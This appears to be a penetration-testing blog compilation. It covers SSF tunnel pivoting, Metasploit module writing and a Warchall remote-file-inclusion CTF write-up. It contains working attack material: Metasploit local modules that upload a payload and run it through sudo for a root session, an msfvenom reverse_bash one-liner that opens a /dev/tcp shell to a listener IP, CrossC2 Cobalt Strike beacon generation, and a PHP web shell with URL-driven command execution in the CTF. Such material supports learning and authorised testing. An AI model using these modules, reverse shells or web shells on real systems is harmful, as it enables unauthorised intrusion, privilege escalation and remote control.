InfoSec Learning



Windows privilege escalation: navigation page

Posted on 2021-01-04 | Category: windows

Windows kernel vulnerabilities

Windows kernel vulnerability privilege escalation tutorial

SSF tunnels

Posted on 2021-01-03 | Category: tools

Introduction

When you gaze long into an abyss, the abyss also gazes into you.

Environment

[Topology diagram]

SSF tunnels

Recorded videos:

  • SSF reverse port forwarding & dynamic forwarding

  • Multi-layer intranet tunnels: SSF forward port forwarding

What is a socket?

Think about it with a question in mind: what makes a tunnel "forward" and what makes it "reverse"? The answer is which side owns the listening port. In a forward tunnel the ssf client listens locally and connections travel towards the server's network; in a reverse tunnel the ssf server opens the listening port and connections are carried back to the network the client can reach.

Forward port forwarding

Step 1:

Run on the server:

upx-ssfd.exe -p 1080

The server listens on port 1080.

Run on the client:

ssf -D 9000 -p 1080 172.20.122.149    (this IP is the server's)

Connect to port 1080 on server 172.20.122.149 and use local port 9000 for dynamic port forwarding. Note that -D opens a local SOCKS proxy that can reach any host the ssf server can reach; a fixed forward of one local port to one target is -L <local port>:<target IP>:<target port> instead.

[Screenshot 1]

[Screenshot 2]

Reverse port forwarding

On the ssf server:

./upx-ssfd -p 1080

On the client (syntax):

ssf.exe -R <port to open on the ssf server>:<target IP>:<target port> -p <ssf server port> <ssf server IP>

Example:

ssf.exe -R 1081:192.168.6.78:3389 -p 1080 192.168.5.8 /b

The ssf server (192.168.5.8) now listens on 1081; anything that connects to 192.168.5.8:1081 is carried back over the client's tunnel to 192.168.6.78:3389, a host only the client can reach.

Forward SOCKS proxy

Forward dynamic port forwarding:

upx-ssfd.exe -p 1080
./upx-ssf -D <local port to open> -p <ssf server port> <ssf server IP>
./upx-ssf -D 1081 -p 1080 192.168.142.133

proxychains configuration (/etc/proxychains.conf, or ~/.proxychains/proxychains.conf):

socks5 127.0.0.1:1081
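To make the forward/reverse distinction concrete, here is a stand-alone Ruby model of what the client side of a forward tunnel does: it owns the listening socket and pumps each accepted connection to one fixed target. This is an added example, not SSF code and not from the original post; the echo service standing in for the target and the 127.0.0.1 addresses are constructed for the demonstration. SSF additionally wraps this in TLS and multiplexes many forwards over a single connection, which this model leaves out.

```ruby
require 'socket'

# Client side of a forward tunnel (the role `ssf -L <local>:<target>:<port>`
# plays): we own the listening port, and every accepted connection is pumped
# to one fixed target. In a reverse tunnel (`-R`) the only thing that changes
# is which end of the ssf connection owns this listener.
class ForwardTunnel
  attr_reader :port

  def initialize(target_host, target_port, listen_host: '127.0.0.1', listen_port: 0)
    @target_host = target_host
    @target_port = target_port
    @server = TCPServer.new(listen_host, listen_port)
    @port = @server.addr[1] # the real port when 0 (ephemeral) was requested
    @thread = Thread.new { accept_loop }
  end

  def close
    @server.close
    @thread.kill
  end

  private

  def accept_loop
    loop do
      client = @server.accept
      Thread.new(client) { |c| relay(c) }
    end
  rescue IOError, Errno::EBADF
    # listener closed by #close
  end

  # One relay per accepted connection: open the upstream leg, then copy
  # bytes in both directions until each side has sent EOF.
  def relay(client)
    upstream = TCPSocket.new(@target_host, @target_port)
    [Thread.new { pump(client, upstream) },
     Thread.new { pump(upstream, client) }].each(&:join)
  ensure
    [client, upstream].compact.each { |s| s.close rescue nil }
  end

  def pump(src, dst)
    while (chunk = src.readpartial(4096))
      dst.write(chunk)
    end
  rescue EOFError, IOError, Errno::ECONNRESET
    # Propagate the half-close so the far end sees EOF in this direction.
    dst.close_write rescue nil
  end
end

# Constructed stand-in for the target service (think of the RDP host behind
# the pivot): read everything the peer sends, echo it back, hang up.
def start_echo_server
  server = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    begin
      loop do
        sock = server.accept
        Thread.new(sock) do |s|
          data = s.read
          s.write(data)
          s.close
        end
      end
    rescue IOError, Errno::EBADF
      # closed by the caller
    end
  end
  server
end

# Talk to the target *through* the tunnel's local port, as a pivoting tool
# would, and return what came back.
def through_tunnel(tunnel_port, payload)
  sock = TCPSocket.new('127.0.0.1', tunnel_port)
  sock.write(payload)
  sock.close_write
  reply = sock.read
  sock.close
  reply
end

if __FILE__ == $PROGRAM_NAME
  echo = start_echo_server
  tunnel = ForwardTunnel.new('127.0.0.1', echo.addr[1])
  puts through_tunnel(tunnel.port, "probe via 127.0.0.1:#{tunnel.port}")
  tunnel.close
  echo.close
end
```

Run it and the probe comes back through the listener, exactly as a tool pointed at the local ssf port would see its target answer. The pump-per-direction shape is what every TCP forwarder, SSF included, does underneath; the SOCKS variant (-D) merely adds a handshake in which the connecting tool names the target instead of it being fixed at start-up.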

References:

https://exposedholes.co.uk/2019/10/27/pivoting-on-windows-secure-socket-funneling/

https://securesocketfunneling.github.io/ssf/#home


A purely software-recommendation article

Posted on 2021-01-03 | Category: tools

Files

Text editing

  • https://notepad-plus-plus.org/downloads/

    Markdown editors

  • https://hemashushu.github.io/yu-writer.site/ Strength: excellent interface design, good-looking and easy to use

  • https://typora.io/
  • https://github.com/jgm/pandoc Strength: many plugins; supports converting markdown to docx

Collaborative online document editing

Shimo Docs (石墨文档)

  • https://shimo.im/desktop

Online topology diagrams

  • https://www.processon.com/

PDF reader

  • https://get.adobe.com/cn/reader/

Multi-computer file synchronisation

Usable inside China:

  • http://www.verysync.com/

Usable outside China: Resilio Sync

Fast file search

  • https://www.voidtools.com/zh-cn/

  • https://github.com/Wox-launcher/Wox

Video playback

  • https://daumpotplayer.com/download/

Upload / download

Sending large files to others

https://cowtransfer.com/

Multi-threaded download manager

  • https://www.freedownloadmanager.org/zh/

May Baidu go out of business soon (Baidu Pan downloader)

  • http://www.speedpan.net/

Other

Open-source password manager

  • https://keepass.info/

Screen recording

https://mathewsachin.github.io/Captura/

Firewall circumvention (翻墙) software

https://www.v2ray.com/

Virtual machine management

  • https://www.vmware.com/products/workstation-pro/workstation-pro-evaluation.html

SSH client for Windows

https://mobaxterm.mobatek.net/


Writing an msf plugin: establishing a new session

Posted on 2020-12-27 | Category: tools

msf: establish a new session

new_session.rb

Its purpose is to establish a new meterpreter session from an existing one.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'new meterpreter session',
      'Description'    => %q{
        Uploads a payload executable through an existing session and runs it,
        so that a new meterpreter session connects back.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'whale3070'
        ],
      'DisclosureDate' => '2019-03-24',
      'References'     =>
        [
          ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],
          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork'      => true,
          'WfsDelay'         => 30
        },
      'DefaultTarget'  => 0))
    register_options [
      OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def timeout
    datastore['TIMEOUT']
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def exploit
    # Upload the payload, make it executable and actually run it. The first
    # version stopped after the upload, so no new session could come back.
    @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
    upload @payload_path, generate_payload_exe
    chmod @payload_path, 0700

    print_status 'Executing payload...'
    # The trailing "echo" gives cmd_exec something to return immediately
    # instead of blocking on the backgrounded payload; PrependFork detaches it.
    res = cmd_exec "#{@payload_path} & echo "
    vprint_line res
  end

  # Called by the payload handler once the new session checks in: remove the
  # dropped binary through the new session, then let the framework register it.
  def on_new_session(session)
    if session.type.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.fs.file.rm @payload_path
    else
      session.shell_command_token "rm -f '#{@payload_path}'"
    end
  ensure
    super
  end
end

TODO: following exploit/linux/local/ptrace_sudo_token_priv_esc, write a check function that tests whether escalation is possible, and then the exploitation routine. (In an Msf::Exploit::Local module the entry point the framework calls is exploit, not run; run is the entry point of Msf::Post modules.)

sudo privilege escalation module

I spent a whole day on this. The plan was to get a root meterpreter session after a successful escalation, but it failed.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Written as a local exploit rather than an Msf::Post module: a Post module
# has no payload, so generate_payload_exe cannot work there, and on_new_session
# is only invoked by an exploit's payload handler. That is why the original
# Msf::Post version never produced a root session.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Auxiliary::Report
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sudo Commands Privilege Escalation',
      'Description'    => %q{
        This module examines the sudoers configuration for the session user
        and lists the commands executable via sudo.

        Each command is inspected for avenues to privileged code execution:
        sudo ALL, a writable command (or a missing command in a writable
        directory), or a shell binary. When sudo ALL or a shell is permitted,
        a payload is uploaded and started through sudo, giving a new session
        running as the run-as user (root by default).

        Note, you may need to provide the password for the session user.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'whale3070' ],
      'Platform'       => [ 'linux' ],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => [ 'meterpreter', 'shell' ],
      'Targets'        => [[ 'Auto', {} ]],
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork'      => true,
          'WfsDelay'         => 30
        },
      'DefaultTarget'  => 0
    ))
    register_options [
      OptString.new('SUDO_PATH', [ true, 'Path to sudo executable', '/usr/bin/sudo' ]),
      OptString.new('PASSWORD', [ false, 'Password for the current user', '' ])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [ false, 'Override check result', false ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def sudo_path
    datastore['SUDO_PATH'].to_s
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def password
    datastore['PASSWORD'].to_s
  end

  def is_executable?(path)
    cmd_exec("test -x '#{path}' && echo true").include? 'true'
  end

  # Shells: permitted via sudo, they hand over a root shell or run arbitrary
  # commands with -c.
  def eop_bins
    %w[
      ash bash sh dash
    ]
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # True for entries the exploit knows how to launch a payload through.
  def launchable?(cmd)
    bin = cmd.split(/\s/).first.to_s
    bin.eql?('ALL') || eop_bins.include?(File.basename(bin))
  end

  #
  # Check if a sudo command offers privileged code execution.
  # This only reports. The earlier version ran `sudo ash` from inside the
  # parser; cmd_exec then blocks on an interactive shell and never returns.
  #
  def check_eop(cmd)
    # drop args for simplicity (at the risk of false positives)
    bin = cmd.split(/\s/).first

    if bin.eql? 'ALL'
      print_good 'sudo any command!'
      return true
    end

    bin_dir  = File.dirname bin
    bin_name = File.basename bin

    if file_exist? bin
      if writable? bin
        print_good "#{bin} is writable!"
        return true
      end
    elsif writable? bin_dir
      print_good "#{bin} does not exist and #{bin_dir} is writable!"
      return true
    end

    if eop_bins.include? bin_name
      print_good "#{bin} matches known privesc executable '#{bin_name}'!"
      return true
    end

    false
  end

  #
  # Retrieve list of sudo commands for current session user
  #
  def sudo_list
    # try non-interactive (-n) without providing a password
    cmd = "#{sudo_path} -n -l"
    vprint_status "Executing: #{cmd}"
    output = cmd_exec(cmd).to_s

    if output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required')
      # try with a password from stdin (-S)
      cmd = "echo '#{password}' | #{sudo_path} -S -l"
      vprint_status "Executing: #{sudo_path} -S -l (password from stdin)"
      output = cmd_exec(cmd).to_s
    end

    output
  end

  #
  # Format sudo output and extract permitted commands
  #
  def parse_sudo(sudo_data)
    cmd_data = sudo_data.scan(/may run the following commands.*?$(.*)\z/m).flatten.first

    # remove leading whitespace from each line and join wrapped lines
    formatted_data = ''
    cmd_data.split("\n").reject { |line| line.eql?('') }.each do |line|
      formatted_line = line.gsub(/^\s*/, '').to_s
      if formatted_line.start_with? '('
        formatted_data << "\n#{formatted_line}"
      else
        formatted_data << " #{formatted_line}"
      end
    end

    formatted_data.split("\n").reject { |line| line.eql?('') }.each do |line|
      run_as = line.scan(/^\((.+?)\)/).flatten.first

      if run_as.blank?
        print_warning "Could not parse sudoers entry: #{line.inspect}"
        next
      end

      user = run_as.split(':')[0].to_s.strip
      group = run_as.split(':')[1].to_s.strip
      no_passwd = false

      cmds = line.scan(/^\(.+?\) (.+)$/).flatten.first.to_s
      if cmds.start_with? 'NOPASSWD:'
        no_passwd = true
        cmds = cmds.gsub(/^NOPASSWD:\s*/, '')
      end

      # Commands are separated by commas but may also contain commas (escaped with a backslash)
      # so we temporarily replace escaped commas with some junk
      # later, we'll replace each instance of the junk with a comma
      junk = Rex::Text.rand_text_alpha(10)
      cmds = cmds.gsub('\, ', junk)

      cmds.split(', ').each do |cmd|
        cmd = cmd.gsub(junk, ', ').strip

        if cmd.start_with? '('
          run_as = cmd.scan(/^\((.+?)\)/).flatten.first

          if run_as.blank?
            print_warning "Could not parse sudo command: #{cmd.inspect}"
            next
          end

          user = run_as.split(':')[0].to_s.strip
          group = run_as.split(':')[1].to_s.strip
          cmd = cmd.scan(/^\(.+?\) (.+)$/).flatten.first.to_s
        end

        msg = "Command: #{cmd.inspect}"
        msg << " RunAsUsers: #{user}" unless user.eql? ''
        msg << " RunAsGroups: #{group}" unless group.eql? ''
        msg << ' without providing a password' if no_passwd
        vprint_status msg

        eop = check_eop cmd
        @eop_cmds << [cmd, user, no_passwd] if eop

        @results << [cmd, user, group, no_passwd ? '' : 'True', eop ? 'True' : '']
      end
    end
  rescue => e
    print_error "Could not parse sudo output: #{e.message}"
  end

  # Cheap, non-interactive check: does sudo -n -l already show permitted
  # commands? A password may still be needed, hence Unknown rather than Safe.
  def check
    if is_root?
      vprint_error 'Session already has root privileges'
      return CheckCode::Safe
    end

    unless is_executable? sudo_path
      vprint_error 'Could not find sudo executable'
      return CheckCode::Safe
    end

    output = cmd_exec("#{sudo_path} -n -l").to_s
    return CheckCode::Appears if output =~ /may run the following commands/

    CheckCode::Unknown
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless is_executable? sudo_path
      fail_with Failure::NotFound, 'Could not find sudo executable'
    end

    output = sudo_list
    vprint_line output
    vprint_line

    if output.include? 'Sorry, try again'
      fail_with Failure::NoAccess, 'Incorrect password'
    end

    if output =~ /^Sorry, .* may not run sudo/
      fail_with Failure::NoAccess, 'Session user is not permitted to execute any commands with sudo'
    end

    if output !~ /may run the following commands/
      fail_with Failure::NoAccess, 'Incorrect password, or the session user is not permitted to execute any commands with sudo'
    end

    @results = Rex::Text::Table.new(
      'Header'  => 'Sudo Commands',
      'Indent'  => 2,
      'Columns' =>
        [
          'Command',
          'RunAsUsers',
          'RunAsGroups',
          'Password?',
          'Privesc?'
        ]
    )
    @eop_cmds = []

    parse_sudo output

    if @results.rows.empty?
      fail_with Failure::NotVulnerable, 'Found no sudo commands for the session user'
    end

    print_line
    print_line @results.to_s

    path = store_loot(
      'sudo.commands',
      'text/csv',
      session,
      @results.to_csv,
      'sudo.commands.txt',
      'Sudo Commands'
    )

    print_good "Output stored in: #{path}"

    # Prefer an entry the payload can be launched through (ALL or a shell).
    # A writable command path is reported, but overwriting the target's
    # binary is left to the operator.
    target_cmd = @eop_cmds.find { |cmd, _user, _no_passwd| launchable? cmd }
    if target_cmd.nil?
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'No sudo ALL or shell entry to launch the payload through. Set ForceExploit to try sudo on the payload anyway.'
      end
      print_warning 'ForceExploit set: trying sudo on the payload directly'
      target_cmd = ['ALL', 'root', false]
    end
    cmd, run_as, no_passwd = target_cmd
    run_as = 'root' if run_as.empty? || run_as.eql?('ALL')

    @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
    upload @payload_path, generate_payload_exe
    chmod @payload_path, 0700

    bin = cmd.split(/\s/).first
    launcher = bin.eql?('ALL') ? @payload_path : "#{bin} -c '#{@payload_path}'"

    # -n never prompts (NOPASSWD entry, or a still-valid sudo timestamp);
    # otherwise the password is fed on stdin with -S. Single quotes inside
    # the password are not escaped here.
    sudo_cmd = if no_passwd || password.empty?
                 "#{sudo_path} -n -u #{run_as} #{launcher}"
               else
                 "echo '#{password}' | #{sudo_path} -S -u #{run_as} #{launcher}"
               end

    print_status "Executing payload via sudo as #{run_as} ..."
    res = cmd_exec "#{sudo_cmd} & echo "
    vprint_line res
  end

  def on_new_session(session)
    if session.type.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.fs.file.rm @payload_path
    else
      session.shell_command_token "rm -f '#{@payload_path}'"
    end
  ensure
    super
  end
end

Reference module: exploit/linux/local/ptrace_sudo_token_priv_esc
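The parse_sudo logic in the module can be exercised without Metasploit. The following is an added example, not the module's code: a stand-alone Ruby parser for sudo -l output, run against a constructed sample. It goes a little further than the module: PASSWD/NOPASSWD tags are tracked per command rather than per line (sudo allows them to change mid-entry), a per-command run-as override is honoured, and the privesc list adds a few binaries beyond ash/bash that can spawn a shell. That list, and the sample output for the user "alice", are my assumptions for the example.

```ruby
# Stand-alone parser for `sudo -l` output, modelled on the module's parse_sudo.
SudoEntry = Struct.new(:command, :run_as_user, :run_as_group, :nopasswd, :privesc)

# Binaries that, when runnable via sudo, hand over a root shell or run
# arbitrary commands (shells plus a few well-known GTFOBins entries).
# Assumption for this example; the module itself only listed ash and bash.
EOP_BINS = %w[ash bash sh dash zsh ksh find vim vi less more awk perl python python3 env].freeze

# Constructed sample of what `sudo -l` prints for user alice, including a
# wrapped line, an escaped comma, a per-command run-as override and ALL.
SUDO_LIST_SAMPLE = <<~'OUT'
  Matching Defaults entries for alice on box:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

  User alice may run the following commands on box:
      (root) NOPASSWD: /usr/bin/ash, /usr/bin/find,
          /usr/bin/vim
      (root : root) /bin/bash -c ls\, -la, (backup) /usr/bin/rsync
      (ALL : ALL) ALL
OUT

# Everything after the "may run the following commands" header (same regex
# as the module).
def extract_command_block(output)
  m = output.match(/may run the following commands.*?$(.*)\z/m)
  m && m[1]
end

# sudo wraps long entries; continuation lines do not start with "(".
def join_wrapped_lines(block)
  joined = []
  block.each_line do |raw|
    line = raw.strip
    next if line.empty?
    if line.start_with?('(')
      joined << line.dup
    elsif joined.any?
      joined[-1] << ' ' << line
    end
  end
  joined
end

# Commands are comma-separated, but a literal comma is printed as "\,".
def split_commands(list)
  marker = "\u0000"
  list.gsub('\, ', marker).split(', ').map { |c| c.gsub(marker, ', ').strip }
end

def privesc?(cmd)
  bin = cmd.split(/\s/).first.to_s
  bin == 'ALL' || EOP_BINS.include?(File.basename(bin))
end

def parse_run_as(spec)
  user, group = spec.split(':').map(&:strip)
  [user.to_s, group.to_s]
end

def parse_sudo_list(output)
  block = extract_command_block(output)
  return [] unless block

  entries = []
  join_wrapped_lines(block).each do |line|
    run_as = line[/\A\((.+?)\)/, 1] or next
    line_user, line_group = parse_run_as(run_as)
    rest = line[/\A\(.+?\) (.+)\z/, 1].to_s
    nopasswd = false

    split_commands(rest).each do |cmd|
      user, group = line_user, line_group
      # Optional per-command run-as override: "(backup) /usr/bin/rsync"
      if cmd.start_with?('(')
        user, group = parse_run_as(cmd[/\A\((.+?)\)/, 1].to_s)
        cmd = cmd[/\A\(.+?\) (.+)\z/, 1].to_s
      end
      # Tags apply to every following command on the line until changed;
      # tags other than PASSWD/NOPASSWD (SETENV:, NOEXEC:, ...) are stripped.
      while (tag = cmd[/\A([A-Z]+):\s*/, 1])
        nopasswd = true if tag == 'NOPASSWD'
        nopasswd = false if tag == 'PASSWD'
        cmd = cmd.sub(/\A[A-Z]+:\s*/, '')
      end
      entries << SudoEntry.new(cmd, user, group, nopasswd, privesc?(cmd))
    end
  end
  entries
end

if __FILE__ == $PROGRAM_NAME
  parse_sudo_list(SUDO_LIST_SAMPLE).each do |e|
    flags = [e.nopasswd ? 'NOPASSWD' : 'password', e.privesc ? 'PRIVESC' : '-'].join(' ')
    puts format('%-24s as %-6s %s', e.command, e.run_as_user, flags)
  end
end
```

Feeding it real sudo -l output from a shell is the quickest way to see which entries the module would flag before running anything on the target; note that both this parser and the module only look at the first word of each command, so an entry with fixed arguments (the "/bin/bash -c ls, -la" line) is flagged even though sudo will refuse a different argument list.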

Reproducing sudo token theft privilege escalation: ptrace Sudo Token Privilege Escalation

How the vulnerability works

https://onestraw.github.io/linux/ptrace-hack/

The ptrace system call, as its name suggests, is for process tracing: it lets a tracer (classically the parent process) observe and control the execution of a tracee, and inspect and modify the tracee's memory image and registers. With Yama ptrace_scope set to 0, any process can attach to any other process running under the same uid, so a compromised unprivileged process can inject code into a sibling process that still holds a valid sudo timestamp and make it run sudo without a password prompt.

Reproduction

echo 0 > /proc/sys/kernel/yama/ptrace_scope

sudo ls

Enter the password.

Writing to ptrace_scope needs root, so that first step is lab setup (Ubuntu defaults to 1, which only allows tracing one's own descendants). The sudo ls step creates the timestamp the exploit reuses; it stays valid for the sudoers timestamp_timeout, 15 minutes by default.

Once an ordinary user has entered the sudo password, exploit/linux/local/ptrace_sudo_token_priv_esc can be used to escalate. On success it returns a root meterpreter session.

Next steps

Rewrite the new_session module and add the privilege-escalation function.


The msf exploit module

Posted on 2020-12-27 | Category: tools

The msf exploit module

It has 4 parts:

  1. class: defines the module class and which msf base class it inherits from (here Msf::Exploit::Remote)

  2. include: pulls in function libraries; these shared modules are called mixins

  3. initialize: defines the options and the module's metadata

  4. exploit: defines the exploit code to run

If there is a syntax or load error, the details are in the log: /root/.msf4/logs/framework.log

A demo I wrote: it uses the Tcp mixin to connect to an FTP port.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Minimal skeleton showing the four parts: class, mixins, initialize, exploit.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  # Only the mixin actually used. The TCP mixin lives under Remote
  # (Msf::Exploit::Remote::Tcp); "Msf::Exploit::Tcp" does not exist and makes
  # the module fail to load (see framework.log). It provides connect, sock
  # and disconnect.
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'whale_tcp_connect_test',
      'Description'    => %q{
        Connects to a TCP port (FTP by default), reads the banner and sends a
        buffer followed by the payload. A template only: there is no real
        target or return address here.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['whale3070'],
      'DisclosureDate' => '2020-12-27',
      'References'     =>
        [
          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'Targets'        => [['Auto', {}]],
      'DefaultTarget'  => 0))
    register_options(
      [
        Opt::RPORT(21)
      ])
  end

  def exploit
    connect
    # FTP servers speak first; read the banner (up to 5 seconds).
    banner = sock.get_once(-1, 5)
    print_status("Banner: #{banner.to_s.strip}")

    # Placeholder buffer: junk followed by the payload. A real exploit would
    # place the overwritten return address at the right offset; the 'Auto'
    # target above has no 'Ret', so target.ret would be nil and
    # [nil].pack('V') raises TypeError, which is why that line is gone.
    buf = rand_text_alpha(1024)
    buf << payload.encoded

    sock.put(buf)
    disconnect

    handler
  end
end

msf error (SESSION may not be compatible)

Posted on 2020-12-22 | Category: tools

msf error (SESSION may not be compatible)

Background: escalating with sudo -s kept failing in msf, although on the target itself the escalation succeeds.

msf has a module called post/multi/manage/sudo.

From its source, it escalates by running sudo -s.

So why does the escalation fail?

Reproducing and debugging the environment

Start the msf listener:

handler -H 192.168.123.123 -P 6677 -p cmd/unix/reverse_bash

Generate the reverse-shell payload:

msfvenom -p cmd/unix/reverse_bash lhost=192.168.123.123 lport=6677 -f raw

0<&165-;exec 165<>/dev/tcp/192.168.123.123/6677;sh <&165 >&165 2>&165

Set up the meterpreter session

After obtaining a cmd/unix shell session with the command above, run sessions -u <session ID> to upgrade it to an x86/linux meterpreter session.

Running the post/multi/manage/sudo module with the meterpreter session gives an error:

[!] SESSION may not be compatible with this module.

With the cmd/unix shell session there is no error.

Look at the source

vi /usr/share/metasploit-framework/modules/post/multi/manage/sudo.rb

On line 32: if the SessionTypes list does not contain 'meterpreter', only shell-type sessions are accepted. Adding it silences the warning:

 'SessionTypes'  => [ 'meterpreter', 'shell' ]

The restriction is more than a label, though: the module drives sudo -s through the session's interactive shell channel, so the elevated shell lives inside that same session. A meterpreter session runs each cmd_exec in a fresh process, so a sudo -s started there cannot leave the session elevated. For a meterpreter session the workable approach is to have sudo start a new payload and take the new session that connects back.

How to write an msf plugin

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::WMIC

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Gather Run Specified WMIC Command',
      'Description'   => %q{ This module runs one WMIC query in the specified
        Meterpreter session and prints the result. It is a trimmed copy of
        Carlos Perez's wmic.rb, which can also read queries from a resource
        file.},
      'License'       => MSF_LICENSE,
      'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptString.new('COMMAND', [true, 'WMIC command options.', 'useraccount get name']),
      ])
  end

  # Run Method for when run command is issued
  def run
    print_status("Executing: wmic #{datastore['COMMAND']}")
    # wmic_query (from the WMIC mixin) runs the query on the session's host
    # and returns its output as a string.
    output = wmic_query(datastore['COMMAND'])
    print_line(output.to_s)
  end
end

Linux privilege escalation: writing an msf privesc module (in progress)

Posted on 2020-12-20 | Category: linux

Cobalt Strike scripts (4)

Posted on 2020-12-13 | Category: cobaltstrike

Linux beacon plugin: CrossC2

Recorded video: Cobalt Strike plugins

1. In the src directory, edit the cna script and set:
$CC2_PATH
$CC2_BIN

2. Copy in the team server's key file:
.cobaltstrike.beacon_keys

3. Generate the Linux beacon:
./genCrossC2.Linux 18.163.137.185 6677 /root/tool/cobaltstrike/CrossC2-master/.cobaltstrike.beacon_keys null Linux x64 test

Windows auxiliary plugin: taowu (梼杌)

Provides information gathering, privilege escalation, lateral movement and more. https://github.com/pandasec888/taowu-cobalt-strike

References

  • https://github.com/gloxec/CrossC2#customextension
  • https://www.cobaltstrike.com/help-scripting
  • https://www.wangan.com/articles/1069

2021 study plan

Posted on 2020-12-12 | Category: experience

Introduction

Diligence perfects one's craft and idleness ruins it; thought shapes one's conduct and drifting along destroys it.

Warchall Live RFI: remote file inclusion

Posted on 2020-12-05 | Category: CTF

Challenge address

Visit http://rfi.warchall.net/.

Fuzz the web directories and look at the index.php source.

Remote command execution

Listing files

http://rfi.warchall.net/temp/payload.php?cmd=ls
conf.txt
index.php.bak
live_rfi.config.php.bak
payload.php
sol.php~
sol.txt
solution.php.bak
tplc

http://rfi.warchall.net/temp/payload.php?cmd=pwd

/home/level/15_live_rfi/www/temp

http://rfi.warchall.net/temp/payload.php?cmd=ls%20-al%20/home/level/15_live_rfi/www

total 44
drwxr-x--- 5 root level15 4096 Jun  3  2012 .
drwxr-x--- 3 root level15 4096 May  8  2012 ..
drwxr-x--- 2 root level15 4096 May  8  2012 cache
-rwxr-x--- 1 root level15  168 Jun  3  2012 de
-rwxr-x--- 1 root level15  157 Jun  3  2012 en
-rwxr-x--- 1 root level15  894 Jun  3  2012 index.php
-rwxr-x--- 1 root level15 4762 Mar 14  2014 live_rfi.config.php
-rwxr-x--- 1 root level15  300 Jun  3  2012 solution.php
drwxrwx--- 3 root level15 4096 Jan 18  2019 temp
drwxr-x--- 4 root level15 4096 Jun  3  2012 tpl

Getting the flag

http://rfi.warchall.net/index.php?lang=php://filter/convert.base64-encode/resource=temp/payload.php

echo PHByZT48P3BocCBzeXN0ZW0oJF9HRVRbImNtZCJdKTsgPz48L3ByZT4= | base64 -d
<pre><?php system($_GET["cmd"]); ?></pre>

---
http://rfi.warchall.net/temp/payload.php?cmd=whoami

level15
Insufficient privileges: wget cannot write a shell to disk

---
http://rfi.warchall.net/temp/payload.php?cmd=pwd

/home/level/15_live_rfi/www/temp

---

`http://rfi.warchall.net/temp/payload.php?cmd=base64 /home/level/15_live_rfi/www/solution.php`

This base64-encodes solution.php; decode it locally or with an online tool, and the flag is at the very bottom of the file.

Trying to write a shell

